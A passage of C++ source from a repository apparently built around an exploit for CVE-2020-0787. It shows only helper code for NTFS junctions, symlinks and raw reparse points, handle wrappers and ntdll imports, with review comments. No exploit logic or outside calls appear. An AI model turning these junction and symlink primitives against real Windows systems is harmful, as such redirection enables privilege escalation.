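            WCHAR PathBuffer[1];
        } SymbolicLinkReparseBuffer;
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            WCHAR PathBuffer[1];
        } MountPointReparseBuffer;
        struct {
            UCHAR DataBuffer[1];
        } GenericReparseBuffer;
    } DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;

// Size of the fixed header (tag + length + reserved) preceding the tag data.
#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)

#define IO_REPARSE_TAG_MOUNT_POINT (0xA0000003L) // winnt
#define IO_REPARSE_TAG_HSM (0xC0000004L) // winnt
#define IO_REPARSE_TAG_DRIVE_EXTENDER (0x80000005L)
#define IO_REPARSE_TAG_HSM2 (0x80000006L) // winnt
#define IO_REPARSE_TAG_SIS (0x80000007L) // winnt
#define IO_REPARSE_TAG_WIM (0x80000008L) // winnt
#define IO_REPARSE_TAG_CSV (0x80000009L) // winnt
#define IO_REPARSE_TAG_DFS (0x8000000AL) // winnt
#define IO_REPARSE_TAG_FILTER_MANAGER (0x8000000BL)
#define IO_REPARSE_TAG_SYMLINK (0xA000000CL) // winnt
#define IO_REPARSE_TAG_IIS_CACHE (0xA0000010L)
#define IO_REPARSE_TAG_DFSR (0x80000012L) // winnt
#define IO_REPARSE_TAG_DEDUP (0x80000013L) // winnt
#define IO_REPARSE_TAG_APPXSTRM (0xC0000014L)
#define IO_REPARSE_TAG_NFS (0x80000014L) // winnt
#define IO_REPARSE_TAG_FILE_PLACEHOLDER (0x80000015L) // winnt
#define IO_REPARSE_TAG_DFM (0x80000016L)
#define IO_REPARSE_TAG_WOF (0x80000017L) // winnt

// Last Win32 error recorded by the helpers in this file. A plain static, so
// not thread-safe; it is only written on the failure paths that touch it.
static int g_last_error = 0;

int ReparsePoint::GetLastError()
{
    return g_last_error;
}

// Opens `path` itself (FILE_FLAG_OPEN_REPARSE_POINT) rather than what it
// resolves to, so its reparse data can be read or, if `writable`, set.
// The returned ScopedHandle owns the handle (not duplicated).
ScopedHandle OpenReparsePoint(const std::wstring& path, bool writable)
{
    HANDLE h = CreateFile(path.c_str(),
        GENERIC_READ | (writable ? GENERIC_WRITE : 0),
        0,
        nullptr,
        OPEN_EXISTING,
        FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT,
        nullptr);

    if (h == INVALID_HANDLE_VALUE)
    {
        g_last_error = GetLastError();
    }

    return ScopedHandle(h, false);
}

// Writes `reparse_buffer` onto the open reparse point via FSCTL_SET_REPARSE_POINT.
static bool SetReparsePoint(const ScopedHandle& handle, typed_buffer_ptr<REPARSE_DATA_BUFFER>& reparse_buffer)
{
    DWORD cb = 0;
    if (!handle.IsValid()) {
        return false;
    }

    bool ret = DeviceIoControl(handle, FSCTL_SET_REPARSE_POINT,
        reparse_buffer, static_cast<DWORD>(reparse_buffer.size()), nullptr, 0, &cb, nullptr) == TRUE;
    if (!ret)
    {
        g_last_error = GetLastError();
    }

    return ret;
}

// Removes the reparse point whose tag is in `reparse_buffer` (header only).
static bool DeleteReparsePoint(const ScopedHandle& handle, PREPARSE_GUID_DATA_BUFFER reparse_buffer)
{
    DWORD cb = 0;
    if (!handle.IsValid()) {
        return false;
    }

    bool ret = DeviceIoControl(handle,
        FSCTL_DELETE_REPARSE_POINT,
        reparse_buffer,
        REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
        nullptr,
        0,
        &cb,
        nullptr) == TRUE;

    if (!ret)
    {
        g_last_error = GetLastError();
    }

    return ret;
}

// Lays out a mount-point (junction) reparse buffer: SubstituteName then
// PrintName, each NUL-terminated, back to back in PathBuffer. The extra
// 8 bytes are the four USHORT offset/length fields, the extra 4 the two
// terminators. NOTE(review): ReparseDataLength is a USHORT; names totalling
// more than ~64 KB would silently wrap.
typed_buffer_ptr<REPARSE_DATA_BUFFER> BuildMountPoint(const std::wstring& target, const std::wstring& printname)
{
    const size_t target_byte_size = target.size() * sizeof(WCHAR);
    const size_t printname_byte_size = printname.size() * sizeof(WCHAR);
    const size_t path_buffer_size = target_byte_size + printname_byte_size + 8 + 4;
    const size_t total_size = path_buffer_size + REPARSE_DATA_BUFFER_HEADER_LENGTH;
    typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer(total_size);

    buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
    buffer->ReparseDataLength = static_cast<USHORT>(path_buffer_size);
    buffer->Reserved = 0;

    buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;
    buffer->MountPointReparseBuffer.SubstituteNameLength = static_cast<USHORT>(target_byte_size);
    // + sizeof(WCHAR) copies the terminating NUL too.
    memcpy(buffer->MountPointReparseBuffer.PathBuffer, target.c_str(), target_byte_size + sizeof(WCHAR));
    buffer->MountPointReparseBuffer.PrintNameOffset = static_cast<USHORT>(target_byte_size + sizeof(WCHAR));
    buffer->MountPointReparseBuffer.PrintNameLength = static_cast<USHORT>(printname_byte_size);
    memcpy(buffer->MountPointReparseBuffer.PathBuffer + target.size() + 1, printname.c_str(), printname_byte_size + sizeof(WCHAR));

    return buffer;
}

// Same layout as BuildMountPoint but for a file symlink: 12 bytes of fixed
// fields (four USHORTs plus the ULONG Flags) and the two NUL terminators.
typed_buffer_ptr<REPARSE_DATA_BUFFER> BuildSymlink(const std::wstring& target, const std::wstring& printname, bool relative)
{
    const size_t target_byte_size = target.size() * sizeof(WCHAR);
    const size_t printname_byte_size = printname.size() * sizeof(WCHAR);
    const size_t path_buffer_size = target_byte_size + printname_byte_size + 12 + 4;
    const size_t total_size = path_buffer_size + REPARSE_DATA_BUFFER_HEADER_LENGTH;
    typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer(total_size);

    buffer->ReparseTag = IO_REPARSE_TAG_SYMLINK;
    buffer->ReparseDataLength = static_cast<USHORT>(path_buffer_size);
    buffer->Reserved = 0;

    buffer->SymbolicLinkReparseBuffer.SubstituteNameOffset = 0;
    buffer->SymbolicLinkReparseBuffer.SubstituteNameLength = static_cast<USHORT>(target_byte_size);
    memcpy(buffer->SymbolicLinkReparseBuffer.PathBuffer, target.c_str(), target_byte_size + sizeof(WCHAR));
    buffer->SymbolicLinkReparseBuffer.PrintNameOffset = static_cast<USHORT>(target_byte_size + sizeof(WCHAR));
    buffer->SymbolicLinkReparseBuffer.PrintNameLength = static_cast<USHORT>(printname_byte_size);
    memcpy(buffer->SymbolicLinkReparseBuffer.PathBuffer + target.size() + 1, printname.c_str(), printname_byte_size + sizeof(WCHAR));
    buffer->SymbolicLinkReparseBuffer.Flags = relative ? SYMLINK_FLAG_RELATIVE : 0;

    return buffer;
}

static bool CreateMountPointInternal(const std::wstring& path, typed_buffer_ptr<REPARSE_DATA_BUFFER>& buffer)
{
    ScopedHandle handle = OpenReparsePoint(path, true);

    if (!handle.IsValid())
    {
        return false;
    }

    return SetReparsePoint(handle, buffer);
}

static bool CreateMountPointInternal(const ScopedHandle& handle, typed_buffer_ptr<REPARSE_DATA_BUFFER>& buffer)
{
    return SetReparsePoint(handle, buffer);
}

// Prefixes a non-native path with \??\ so the substitute name is an NT path.
std::wstring FixupPath(std::wstring str)
{
    if (str[0] != '\\')
    {
        return L"\\??\\" + str;
    }

    return str;
}

// Turns the existing directory `path` into a mount point onto `target`.
// Empty targets are rejected; other failures leave the cause in GetLastError().
bool ReparsePoint::CreateMountPoint(const std::wstring& path, const std::wstring& target, const std::wstring& printname)
{
    if (target.length() == 0)
    {
        return false;
    }

    return CreateMountPointInternal(path, BuildMountPoint(FixupPath(target), printname));
}

// Sets a symlink reparse point on the existing file/directory `path`.
// `relative` targets are stored verbatim; absolute ones get the \??\ prefix.
bool ReparsePoint::CreateSymlink(const std::wstring& path, const std::wstring& target, const std::wstring& printname, bool relative)
{
    if (target.length() == 0)
    {
        return false;
    }

    return CreateMountPointInternal(path, BuildSymlink(!relative ? FixupPath(target) : target, printname, relative));
}

// As above, on an already-open handle; `h` is duplicated, not taken over.
bool ReparsePoint::CreateSymlink(HANDLE h, const std::wstring& target, const std::wstring& printname, bool relative)
{
    ScopedHandle handle(h, true);

    if (!handle.IsValid())
    {
        return false;
    }

    return CreateMountPointInternal(handle, BuildSymlink(!relative ? FixupPath(target) : target, printname, relative));
}

bool ReparsePoint::DeleteMountPoint(const std::wstring& path)
{
    REPARSE_GUID_DATA_BUFFER reparse_buffer = { 0 };
    reparse_buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;

    ScopedHandle handle = OpenReparsePoint(path, true);

    return DeleteReparsePoint(handle, &reparse_buffer);
}

// Sets a reparse point with an arbitrary tag and opaque payload. Payloads
// larger than a USHORT can describe are rejected instead of being truncated.
bool ReparsePoint::CreateRawMountPoint(const std::wstring& path, DWORD reparse_tag, const std::vector<BYTE>& buffer)
{
    if (buffer.size() > 0xFFFFu)
    {
        g_last_error = ERROR_INVALID_PARAMETER;
        return false;
    }

    typed_buffer_ptr<REPARSE_DATA_BUFFER> reparse_buffer(REPARSE_DATA_BUFFER_HEADER_LENGTH + buffer.size());

    reparse_buffer->ReparseTag = reparse_tag;
    reparse_buffer->ReparseDataLength = static_cast<USHORT>(buffer.size());
    reparse_buffer->Reserved = 0;
    if (!buffer.empty())
    {
        // &buffer[0] on an empty vector is undefined; guard the copy instead.
        memcpy(reparse_buffer->GenericReparseBuffer.DataBuffer, buffer.data(), buffer.size());
    }

    return CreateMountPointInternal(path, reparse_buffer);
}

// Reads the reparse data behind `handle`. Returns an empty buffer (size 0) on
// failure or if fewer bytes than the fixed header came back; otherwise the
// buffer is trimmed to the byte count the driver returned. Takes the handle
// by reference: the original's by-value parameter duplicated it on every call.
static typed_buffer_ptr<REPARSE_DATA_BUFFER> GetReparsePointData(const ScopedHandle& handle)
{
    typed_buffer_ptr<REPARSE_DATA_BUFFER> buf(MAXIMUM_REPARSE_DATA_BUFFER_SIZE);

    DWORD dwBytesReturned = 0;
    if (!DeviceIoControl(handle,
        FSCTL_GET_REPARSE_POINT,
        NULL,
        0,
        buf,
        static_cast<DWORD>(buf.size()),
        &dwBytesReturned,
        nullptr)
        )
    {
        g_last_error = GetLastError();
        buf.reset(0);
    }
    else if (dwBytesReturned < static_cast<DWORD>(REPARSE_DATA_BUFFER_HEADER_LENGTH))
    {
        g_last_error = ERROR_INVALID_DATA;
        buf.reset(0);
    }
    else
    {
        buf.resize(dwBytesReturned);
    }

    return buf;
}

// Bytes of PathBuffer actually present in `buffer`, given PathBuffer's byte
// offset within REPARSE_DATA_BUFFER: bounded by both the driver-reported
// ReparseDataLength and the bytes really read. Zero if neither reaches it.
static size_t PathBufferBytes(typed_buffer_ptr<REPARSE_DATA_BUFFER>& buffer, size_t path_buffer_offset)
{
    const size_t data_end = REPARSE_DATA_BUFFER_HEADER_LENGTH + buffer->ReparseDataLength;
    const size_t limit = data_end < buffer.size() ? data_end : buffer.size();
    return limit > path_buffer_offset ? limit - path_buffer_offset : 0;
}

// Copies the `length` bytes at byte `offset` of PathBuffer into `out`, after
// checking the slice lies within the `path_buffer_bytes` available. Offsets
// and lengths come from on-disk reparse data and are not trusted; the
// original indexed with them unchecked.
static bool CopyPathBufferSlice(const WCHAR* path_buffer, size_t path_buffer_bytes,
    USHORT offset, USHORT length, std::wstring& out)
{
    if (static_cast<size_t>(offset) + length > path_buffer_bytes)
    {
        g_last_error = ERROR_INVALID_DATA;
        return false;
    }

    const WCHAR* start = path_buffer + offset / 2;
    out.assign(start, start + length / 2);
    return true;
}

// Returns the substitute name of the mount point at `path`, or L"" with
// GetLastError() set (ERROR_REPARSE_TAG_MISMATCH if it is not a mount point).
std::wstring ReparsePoint::GetMountPointTarget(const std::wstring& path)
{
    ScopedHandle handle = OpenReparsePoint(path, false);
    if (!handle.IsValid())
    {
        return L"";
    }

    typed_buffer_ptr<REPARSE_DATA_BUFFER> buf = GetReparsePointData(handle);

    if (buf.size() == 0)
    {
        return L"";
    }

    if (buf->ReparseTag != IO_REPARSE_TAG_MOUNT_POINT)
    {
        g_last_error = ERROR_REPARSE_TAG_MISMATCH;
        return L"";
    }

    std::wstring target;
    if (!CopyPathBufferSlice(buf->MountPointReparseBuffer.PathBuffer,
        PathBufferBytes(buf, FIELD_OFFSET(REPARSE_DATA_BUFFER, MountPointReparseBuffer.PathBuffer)),
        buf->MountPointReparseBuffer.SubstituteNameOffset,
        buf->MountPointReparseBuffer.SubstituteNameLength, target))
    {
        return L"";
    }

    return target;
}

bool ReparsePoint::IsReparsePoint(const std::wstring& path)
{
    ScopedHandle handle = OpenReparsePoint(path, false);
    BY_HANDLE_FILE_INFORMATION file_info = { 0 };

    return handle.IsValid() && GetFileInformationByHandle(handle, &file_info) && (file_info.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT) != 0;
}

// Reads the reparse data at `path` into `reparse_buffer`, trimmed to the
// bytes returned. Fails (with GetLastError() set) if the path cannot be
// opened, the FSCTL fails, or fewer bytes than the fixed header came back.
static bool ReadReparsePoint(const std::wstring& path, typed_buffer_ptr<REPARSE_DATA_BUFFER>& reparse_buffer)
{
    ScopedHandle handle = OpenReparsePoint(path, false);
    if (!handle.IsValid())
    {
        // g_last_error was set by OpenReparsePoint.
        return false;
    }

    reparse_buffer.reset(4096);
    DWORD dwSize = 0;

    bool ret = DeviceIoControl(handle, FSCTL_GET_REPARSE_POINT, nullptr, 0, reparse_buffer, static_cast<DWORD>(reparse_buffer.size()), &dwSize, nullptr) == TRUE;
    if (!ret)
    {
        g_last_error = GetLastError();
        return false;
    }

    if (dwSize < static_cast<DWORD>(REPARSE_DATA_BUFFER_HEADER_LENGTH))
    {
        // Too short to even carry a tag; callers would read past dwSize.
        g_last_error = ERROR_INVALID_DATA;
        return false;
    }

    reparse_buffer.resize(dwSize);
    return true;
}

static bool IsReparseTag(const std::wstring& path, DWORD reparse_tag)
{
    typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer;

    if (ReadReparsePoint(path, buffer))
    {
        return buffer->ReparseTag == reparse_tag;
    }
    else
    {
        return false;
    }
}

bool ReparsePoint::IsMountPoint(const std::wstring& path)
{
    return IsReparseTag(path, IO_REPARSE_TAG_MOUNT_POINT);
}

bool ReparsePoint::IsSymlink(const std::wstring& path)
{
    return IsReparseTag(path, IO_REPARSE_TAG_SYMLINK);
}

// Reads the substitute and print names of the mount point at `path`. Returns
// false (GetLastError() set) if it is not a mount point or the name offsets
// point outside the data; `target` may already be written in that case.
bool ReparsePoint::ReadMountPoint(const std::wstring& path, std::wstring& target, std::wstring& printname)
{
    typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer;

    if (!ReadReparsePoint(path, buffer))
    {
        return false;
    }

    if (buffer->ReparseTag != IO_REPARSE_TAG_MOUNT_POINT)
    {
        g_last_error = ERROR_REPARSE_TAG_MISMATCH;
        return false;
    }

    const size_t avail = PathBufferBytes(buffer, FIELD_OFFSET(REPARSE_DATA_BUFFER, MountPointReparseBuffer.PathBuffer));
    const WCHAR* names = buffer->MountPointReparseBuffer.PathBuffer;

    return CopyPathBufferSlice(names, avail, buffer->MountPointReparseBuffer.SubstituteNameOffset,
            buffer->MountPointReparseBuffer.SubstituteNameLength, target)
        && CopyPathBufferSlice(names, avail, buffer->MountPointReparseBuffer.PrintNameOffset,
            buffer->MountPointReparseBuffer.PrintNameLength, printname);
}

// Symlink counterpart of ReadMountPoint; `flags` (may be null) receives the
// SYMLINK_FLAG_* bits.
bool ReparsePoint::ReadSymlink(const std::wstring& path, std::wstring& target, std::wstring& printname, unsigned int* flags)
{
    typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer;

    if (!ReadReparsePoint(path, buffer))
    {
        return false;
    }

    if (buffer->ReparseTag != IO_REPARSE_TAG_SYMLINK)
    {
        g_last_error = ERROR_REPARSE_TAG_MISMATCH;
        return false;
    }

    const size_t avail = PathBufferBytes(buffer, FIELD_OFFSET(REPARSE_DATA_BUFFER, SymbolicLinkReparseBuffer.PathBuffer));
    const WCHAR* names = buffer->SymbolicLinkReparseBuffer.PathBuffer;

    if (!CopyPathBufferSlice(names, avail, buffer->SymbolicLinkReparseBuffer.SubstituteNameOffset,
            buffer->SymbolicLinkReparseBuffer.SubstituteNameLength, target)
        || !CopyPathBufferSlice(names, avail, buffer->SymbolicLinkReparseBuffer.PrintNameOffset,
            buffer->SymbolicLinkReparseBuffer.PrintNameLength, printname))
    {
        return false;
    }

    if (flags)
    {
        *flags = buffer->SymbolicLinkReparseBuffer.Flags;
    }
    return true;
}

// Returns the tag and raw tag data of the reparse point at `path`. The
// driver-reported ReparseDataLength is checked against the bytes actually
// read before copying; an empty payload yields an empty vector.
bool ReparsePoint::ReadRaw(const std::wstring& path, unsigned int* reparse_tag, std::vector<BYTE>& raw_data)
{
    typed_buffer_ptr<REPARSE_DATA_BUFFER> buffer;

    if (!ReadReparsePoint(path, buffer))
    {
        return false;
    }

    const size_t available = buffer.size() - REPARSE_DATA_BUFFER_HEADER_LENGTH;
    if (buffer->ReparseDataLength > available)
    {
        g_last_error = ERROR_INVALID_DATA;
        return false;
    }

    *reparse_tag = buffer->ReparseTag;
    raw_data.assign(buffer->GenericReparseBuffer.DataBuffer,
        buffer->GenericReparseBuffer.DataBuffer + buffer->ReparseDataLength);
    return true;
}

--------------------------------------------------------------------------------
/CVE-2020-0787_CNA/CommonUtils/ReparsePoint.h: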
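--------------------------------------------------------------------------------
#pragma once

#include <string>
#include <vector>

// Static helpers for creating, inspecting and removing NTFS reparse points
// (mount points / junctions, file symlinks and raw-tagged data) through
// FSCTL_*_REPARSE_POINT. Failures are reported as false / L"" and the Win32
// error is kept in GetLastError(); that state is a file-level static and is
// not thread-safe.
class ReparsePoint
{
public:

    static bool CreateMountPoint(const std::wstring& path, const std::wstring& target, const std::wstring& printname);
    static bool DeleteMountPoint(const std::wstring& path);
    static std::wstring GetMountPointTarget(const std::wstring& path);
    static bool CreateRawMountPoint(const std::wstring& path, DWORD reparse_tag, const std::vector<BYTE>& buffer);
    static bool IsMountPoint(const std::wstring& path);
    static bool IsSymlink(const std::wstring& path);
    static bool ReadMountPoint(const std::wstring& path, std::wstring& target, std::wstring& printname);
    static bool ReadSymlink(const std::wstring& path, std::wstring& target, std::wstring& printname, unsigned int* flags);
    static bool ReadRaw(const std::wstring& path, unsigned int* reparse_tag, std::vector<BYTE>& raw_data);
    static bool IsReparsePoint(const std::wstring& path);
    static bool CreateSymlink(const std::wstring& path, const std::wstring& target, const std::wstring& printname, bool relative);
    // Operates on a duplicate of `h`; the caller keeps ownership of `h`.
    static bool CreateSymlink(HANDLE h, const std::wstring& target, const std::wstring& printname, bool relative);

    // Last error recorded by this class, not the thread's Win32 last error.
    // Inside member functions this hides ::GetLastError(); qualify when the
    // Win32 one is meant.
    static int GetLastError();
};

--------------------------------------------------------------------------------
/CVE-2020-0787_CNA/CommonUtils/ScopedHandle.cpp:
--------------------------------------------------------------------------------
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.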
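// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

#include "stdafx.h"
#include "ScopedHandle.h"

// Duplicates `h` into this process with the same access. Returns nullptr when
// `h` is not a usable handle or DuplicateHandle fails.
static HANDLE Duplicate(HANDLE h)
{
    HANDLE dup = nullptr;

    if ((h == nullptr) || (h == INVALID_HANDLE_VALUE)
        || !DuplicateHandle(GetCurrentProcess(), h, GetCurrentProcess(), &dup, 0, FALSE, DUPLICATE_SAME_ACCESS))
    {
        return nullptr;
    }

    return dup;
}

// `duplicate` == false takes ownership of `h` as-is (including the
// INVALID_HANDLE_VALUE sentinel, which IsValid() reports as invalid).
ScopedHandle::ScopedHandle(HANDLE h, bool duplicate)
    : g_h(duplicate ? Duplicate(h) : h)
{
}

// Copying duplicates the underlying handle, so each instance closes its own.
ScopedHandle::ScopedHandle(const ScopedHandle& other)
    : g_h(Duplicate(other.g_h))
{
}

ScopedHandle& ScopedHandle::operator=(const ScopedHandle& other)
{
    if (this != &other)
    {
        // Duplicate first, then release the handle we previously owned; the
        // original overwrote g_h without closing it and leaked the handle.
        HANDLE dup = Duplicate(other.g_h);
        Close();
        g_h = dup;
    }

    return *this;
}

ScopedHandle::ScopedHandle(ScopedHandle&& other)
    : g_h(other.g_h)
{
    other.g_h = nullptr;
}

ScopedHandle& ScopedHandle::operator=(ScopedHandle&& other)
{
    if (this != &other)
    {
        Close();   // same leak as copy-assignment in the original
        g_h = other.g_h;
        other.g_h = nullptr;
    }

    return *this;
}

// Closes the handle if it is valid and resets to nullptr; safe to call twice.
void ScopedHandle::Close()
{
    if (IsValid())
    {
        CloseHandle(g_h);
        g_h = nullptr;
    }
}

// Releases the current handle and takes ownership of `h` without duplicating.
void ScopedHandle::Reset(HANDLE h)
{
    Close();
    g_h = h;
}

ScopedHandle::~ScopedHandle()
{
    Close();
}

--------------------------------------------------------------------------------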
/CVE-2020-0787_CNA/CommonUtils/ScopedHandle.h: --------------------------------------------------------------------------------
1 | #pragma once
// RAII owner of a Win32 HANDLE. Copies duplicate the handle (DuplicateHandle),
// moves transfer it, and the destructor closes it — see ScopedHandle.cpp.
2 | class ScopedHandle
3 | {
4 | HANDLE g_h;
5 |
6 | public:
// duplicate == true stores a DuplicateHandle() copy of h (nullptr if that
// fails); duplicate == false takes ownership of h as-is.
7 | ScopedHandle(HANDLE h, bool duplicate);
8 | void Close();
// Closes the current handle (if valid) and adopts h without duplicating it.
9 | void Reset(HANDLE h);
// Both nullptr and INVALID_HANDLE_VALUE count as "no handle".
10 | bool IsValid() const {
11 | return (g_h != nullptr) && (g_h != INVALID_HANDLE_VALUE);
12 | }
13 | ScopedHandle(const ScopedHandle& other);
14 | ScopedHandle& operator=(const ScopedHandle& other);
15 |
16 | ScopedHandle(ScopedHandle&& other);
17 | ScopedHandle& operator=(ScopedHandle&& other);
18 |
// Non-owning view of the handle; ownership stays with this object, so the
// caller must not CloseHandle() the returned value (the destructor will).
19 | operator HANDLE() const {
20 | return g_h;
21 | }
22 |
23 | ~ScopedHandle();
24 | };
25 |
26 |
-------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/ntimports.h: --------------------------------------------------------------------------------
1 | #pragma once
2 |
// NOTE(review): the `#include` targets were stripped by the page extraction.
// The types used below (NTSTATUS, OBJECT_ATTRIBUTES, UNICODE_STRING,
// IO_STATUS_BLOCK) come from <windows.h> / <winternl.h> — confirm upstream.
3 | #include
4 | #include
5 |
// Access-mask bits for NT object directories.
6 | #define DIRECTORY_QUERY 0x0001
7 | #define DIRECTORY_TRAVERSE 0x0002
8 | #define DIRECTORY_CREATE_OBJECT 0x0004
9 | #define DIRECTORY_CREATE_SUBDIRECTORY 0x0008
10 | #define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
11 |
// Function-pointer typedefs for ntdll exports. Instances are bound at runtime
// with DEFINE_NTDLL (bottom of this file), which looks the symbol up through
// GetProcAddressNT (declared in stdafx.h); nothing here is linked statically.
12 | typedef NTSTATUS(NTAPI *_NtCreateDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
13 | typedef NTSTATUS(NTAPI *_NtCreateDirectoryObjectEx)(PHANDLE Handle, ACCESS_MASK DesiredAccess,
14 | POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ShadowDir, BOOLEAN Something);
15 | typedef NTSTATUS(NTAPI *_NtOpenDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
16 | typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
17 |
18 | #define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
19 |
20 | typedef NTSTATUS(NTAPI* _NtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);
21 | typedef NTSTATUS(NTAPI* _NtOpenSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
22 | typedef NTSTATUS(NTAPI* _NtQuerySymbolicLinkObject)(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength);
23 | typedef NTSTATUS(NTAPI* _NtOpenFile)(
24 | _Out_ PHANDLE FileHandle,
25 | _In_ ACCESS_MASK DesiredAccess,
26 | _In_ POBJECT_ATTRIBUTES ObjectAttributes,
27 | _Out_ PIO_STATUS_BLOCK IoStatusBlock,
28 | _In_ ULONG ShareAccess,
29 | _In_ ULONG OpenOptions
30 | );
31 |
// FILE_INFORMATION_CLASS value for FILE_LINK_INFORMATION (WDK ntifs.h);
// presumably passed as FileInformationClass to _ZwSetInformationFile below.
32 | const ULONG FileLinkInformation = 11;
33 |
// Variable-length: FileName is FileNameLength bytes, not one WCHAR.
34 | typedef struct _FILE_LINK_INFORMATION {
35 | BOOLEAN ReplaceIfExists;
36 | HANDLE RootDirectory;
37 | ULONG FileNameLength;
38 | WCHAR FileName[1];
39 | } FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
40 |
// NOTE(review): declared __stdcall while every other typedef uses NTAPI;
// the two are equivalent on x86 but the inconsistency is worth normalising.
41 | typedef NTSTATUS(__stdcall *_ZwSetInformationFile)(
42 | _In_ HANDLE FileHandle,
43 | _Out_ PIO_STATUS_BLOCK IoStatusBlock,
44 | _In_ PVOID FileInformation,
45 | _In_ ULONG Length,
46 | _In_ ULONG FileInformationClass
47 | );
48 | typedef ULONG(NTAPI* _RtlNtStatusToDosError)(NTSTATUS status);
// Translates an NTSTATUS into a Win32 last-error value; defined elsewhere.
49 | void SetNtLastError(NTSTATUS status);
50 |
// Declares a local `f<name>` pointer of type `_<name>` bound via
// GetProcAddressNT("<name>"); the result is not checked for nullptr here,
// so callers should verify it before calling through.
51 | #define DEFINE_NTDLL(x) _ ## x f ## x = (_ ## x)GetProcAddressNT(#x)
52 |
-------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/stdafx.cpp: --------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // CommonUtils.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
-------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/stdafx.h: --------------------------------------------------------------------------------
1 | // stdafx.h : include file for
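standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 | #include
10 |
11 | FARPROC GetProcAddressNT(LPCSTR lpName);
-------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/targetver.h: --------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
-------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/typed_buffer.h: --------------------------------------------------------------------------------
#pragma once

#include <algorithm>
#include <cstring>
#include <memory>
#include <utility>

// Owns a zero-filled byte buffer that is viewed as a T. Intended for
// variable-length structures whose size is only known at run time.
// Non-copyable, movable. size() is the byte length of the buffer, not a
// count of T objects.
//
// Fixes relative to the original:
//   - size_ is initialised (the default constructor left it indeterminate,
//     so a later resize() copied an unbounded number of bytes from nullptr);
//   - resize() now records the new size and zero-fills the added tail;
//   - cget() used the non-existent `interpret_cast`;
//   - move-assignment returned nothing (undefined behaviour on use);
//   - the deleted copy-assignment was declared with an ill-formed
//     in-class qualified name.
template <typename T>
class typed_buffer_ptr {
	std::unique_ptr<char[]> buffer_;
	size_t size_ = 0;

public:
	typed_buffer_ptr() = default;

	// Allocates and zero-fills a buffer of `size` bytes.
	explicit typed_buffer_ptr(size_t size) {
		reset(size);
	}

	// Replaces the buffer with a fresh zero-filled one of `size` bytes.
	void reset(size_t size) {
		buffer_.reset(new char[size]());  // value-initialised: all bytes zero
		size_ = size;
	}

	// Grows or shrinks the buffer to `size` bytes, keeping the common prefix
	// of the old contents and zero-filling any new tail.
	void resize(size_t size) {
		std::unique_ptr<char[]> tmp(new char[size]());
		if (buffer_) {
			// Parenthesised to dodge the Windows `min` macro when <windows.h>
			// is included ahead of this header.
			std::memcpy(tmp.get(), buffer_.get(), (std::min)(size, size_));
		}
		buffer_ = std::move(tmp);
		size_ = size;
	}

	// Implicit views of the storage as T; nullptr when no buffer is held.
	operator T*() {
		return reinterpret_cast<T*>(buffer_.get());
	}

	operator const T*() const {
		return cget();
	}

	T* operator->() const {
		return reinterpret_cast<T*>(buffer_.get());
	}

	const T* cget() const {
		return reinterpret_cast<const T*>(buffer_.get());
	}

	typed_buffer_ptr(const typed_buffer_ptr& other) = delete;
	typed_buffer_ptr& operator=(const typed_buffer_ptr& other) = delete;

	// Moves leave `other` empty with size() == 0.
	typed_buffer_ptr(typed_buffer_ptr&& other) noexcept
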